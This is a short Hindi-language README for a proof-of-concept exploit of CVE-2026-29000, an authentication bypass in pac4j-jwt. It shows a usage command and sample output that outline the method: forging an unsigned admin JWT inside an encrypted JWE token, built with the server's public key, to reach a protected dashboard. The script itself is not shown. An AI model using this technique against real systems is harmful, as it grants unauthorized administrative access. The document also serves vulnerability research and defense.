
CVE-2026-29000 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, pac4j-jwt में एक प्रमाणीकरण बायपास। संरक्षित एंडपॉइंट्स तक एडमिन पहुंच प्राप्त करने के लिए JWT टोकन जाली बनाता है।
नोट: यह मेरा मूल कार्य नहीं है। मैं इसे संदर्भ के लिए यहाँ रख रहा हूँ।
कार्य विधि:
python3 exploit.py http://IP:PORT
[*] Fetching JWKS...
[+] Got RSA public key (kid: enc-key-1)
[*] Crafted PlainJWT with sub=admin, role=ROLE_ADMIN
[+] Forged JWE token created
[*] Accessing /api/dashboard...
[+] Status: 200
[+] Authenticated as: admin (ROLE_ADMIN)
[+] Token: eyJhbGciOiAiUlN_.....[Redacted].....D4zwSEY05lFkCB.J933HR-irY6a0r2uivRLZw